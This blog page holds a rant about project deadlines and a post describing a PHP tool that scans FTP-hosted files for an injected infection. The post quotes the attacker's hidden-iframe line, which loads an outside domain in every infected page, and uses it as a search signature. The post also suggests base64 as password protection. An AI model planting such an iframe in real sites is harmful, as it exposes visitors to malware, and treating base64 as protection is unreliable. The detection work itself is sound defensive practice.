A few simple things about common sense

When you sign up for a project (with a deadline), pick a project in a field you know well. If you still want to try something that is new to you, start early.

When you do something for the first time, it takes you at least 2-3 times longer than it will take you the second time. In time you will do the same thing much faster, but only after you gain experience.

So when you plan your time, you also have to account for the extra time lost getting familiar with the field in question; you certainly don't start a week before the deadline, when not even someone with experience would have enough time left to finish, not even something of mediocre quality.

If you still don't follow what I said earlier, I can conclude that you think you're a ninja and can do things that are unusual for ordinary people, but then why do you stress others with elementary questions from the field you jumped into without thinking and without knowing even the basics?

When in the end you manage to produce a crap project that doesn't amount to even a quarter of what you promised at the start (when you were beating your chest that you're the best and can do this and that), don't expect everyone to praise you. Instead, you can complain that those who criticize you are just losers. Let them do the project if they're so great!

From now on I'll leave you to manage on your own, you ninjas!

How to search in files on FTP (remove PHP infections)

The infection

Recently, my site was infected with some kind of PHP virus. My FTP account was broken into (brute force, I suppose), so every PHP file that contains "index" and "main" in its filename was modified, and the following line of code was added:

echo "<iframe src=\"http://some-stupid-domain.com/?some-parameter=xx1B10xx\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

So, the effects of this are:

  • some scripts refuse to work (phpMyAdmin, phpBB forum login, etc.), mostly every script that uses the header() function from PHP
  • I was temporarily blacklisted by Google
  • my users were exposed to the risk of being infected with malware
  • I got nervous (and I'm usually very calm)
  • I discovered that my hosting company sucks (I cannot upload files with multiple connections because I get blocklisted by their firewall, but my password can be stolen using a brute-force attack, and when this happens it is supposed to be only my problem)

The solution

I needed a script to find which files contain malicious code, so I made a PHP script that connects through FTP and searches every file and every directory for PHP files (I tried to find software for this, but with no results). When a PHP file is found on the FTP server, the script downloads it and searches it for the malicious code.

Also, when a file is detected as "infected", the script makes a copy of that file in the backup folder, so the webmaster can manually check and delete the unwanted code. I prefer manual disinfection, because various versions of the code were found (with links to different domains).

Features:

I know that an FTP connection is not something you can rely on, and the connection will break after some time. So the script should loop to retry every failed command a few times before it exits. This solution requires more lines of code, and the complexity of the algorithm will increase.

To fix this issue, I added a list of already parsed files and directories (parsed.txt). When the script finds a directory or a file that's on that list, it ignores it (since it is already parsed). This way, you can forcibly stop the script whenever you want and resume it anytime.

Also, a list of infected files will be created (if any infected file is found).
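
The checkpoint idea described above (parsed.txt plus a list of infected files), as an added example that is not the code of find_in_files_on_ftp.php. $list and $fetch are hypothetical callbacks that would wrap an FTP directory listing and a download; here they read a constructed in-memory tree, and the second fetch throws to simulate a dropped connection so the resume behaviour can be seen offline (PHP 7.4+).

```php
<?php
// Added example, not the original script; $list and $fetch are hypothetical callbacks.
function mark(string $file, string $path, array &$seen): void
{
    file_put_contents($file, $path . "\n", FILE_APPEND | LOCK_EX);
    $seen[$path] = true;
}
function scan(string $dir, callable $list, callable $fetch, string $marker,
              string $parsedFile, string $infectedFile, array &$seen): void
{
    if (isset($seen[$dir])) {
        return; // directory fully handled in an earlier run
    }
    foreach ($list($dir) as [$name, $isDir]) {
        $path = rtrim($dir, '/') . '/' . $name;
        if ($isDir) {
            scan($path, $list, $fetch, $marker, $parsedFile, $infectedFile, $seen);
        } elseif (!isset($seen[$path]) && preg_match('/\.php$/i', $name)) {
            if (strpos($fetch($path), $marker) !== false) {
                // Log the hit before the checkpoint: a crash in between
                // repeats the file instead of losing the finding.
                file_put_contents($infectedFile, $path . "\n", FILE_APPEND | LOCK_EX);
            }
            mark($parsedFile, $path, $seen);
        }
    }
    mark($parsedFile, $dir, $seen); // only once every child is done
}
// Constructed sample tree and file contents (not real data).
$tree = [
    '/'      => [['index.php', false], ['logo.png', false], ['forum', true]],
    '/forum' => [['main.php', false], ['common.php', false]],
];
$bad = '<?php echo "<iframe src=\"http://example.invalid/\"></iframe>";';
$files = ['/index.php' => $bad, '/forum/main.php' => '<?php echo "hello";',
          '/forum/common.php' => $bad];
$parsed   = tempnam(sys_get_temp_dir(), 'par'); // stands in for parsed.txt
$infected = tempnam(sys_get_temp_dir(), 'inf'); // stands in for the infected list
$calls = 0;
$list  = fn(string $d) => $tree[$d];
$fetch = function (string $p) use ($files, &$calls) {
    if (++$calls === 2) { throw new RuntimeException('connection dropped'); }
    return $files[$p];
};
for ($run = 1; $run <= 2; $run++) { // the second pass resumes from the checkpoint
    $seen = array_flip(file($parsed, FILE_IGNORE_NEW_LINES));
    try { scan('/', $list, $fetch, 'echo "<iframe', $parsed, $infected, $seen); }
    catch (RuntimeException $e) { echo "run $run stopped: ", $e->getMessage(), "\n"; }
}
echo file_get_contents($infected);
```

A directory is written to the checkpoint only after all of its children, so an interrupted run never causes a half-scanned directory to be skipped on resume.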

Configuration

Before you can run the script, you need to modify the FTP server info (server address, login username and password).

To do this, you need to open find_in_files_on_ftp.php with your favorite code editor (avoid Notepad, please). The lines you need to edit are shown below:

// Configuration
$ftp_server = 'your_ftp_server';
$ftp_user = 'your_ftp_username';
$ftp_pass = base64_decode('password encoded as base64');
$virus_string = 'echo "<iframe'; // string to search for

I hope it is very clear what every variable means, so I will not discuss them, except for the password. I chose base64 encoding for my password, so if someone sees it, he can't remember it even if it's a common word.

Also, if you want to change the connection port (the default is 21), you can manually edit line 19 and replace 21 with your desired port.

Running the script

The script was made and tested on Windows XP, but it should work on every OS that supports PHP. I will test it on Linux when I have some free time.

To run the script on Windows you should have PHP installed and follow one of the following procedures:

  • Add the php/bin folder to the PATH environment variable, so you can easily run PHP with the "php" command, and run find_in_files_on_ftp.bat
  • Right-click on the find_in_files_on_ftp.php file, choose Open with and Browse to php.exe

Download

Click on the link below to download (~2.47 kbytes):

find_in_files_on_ftp.zip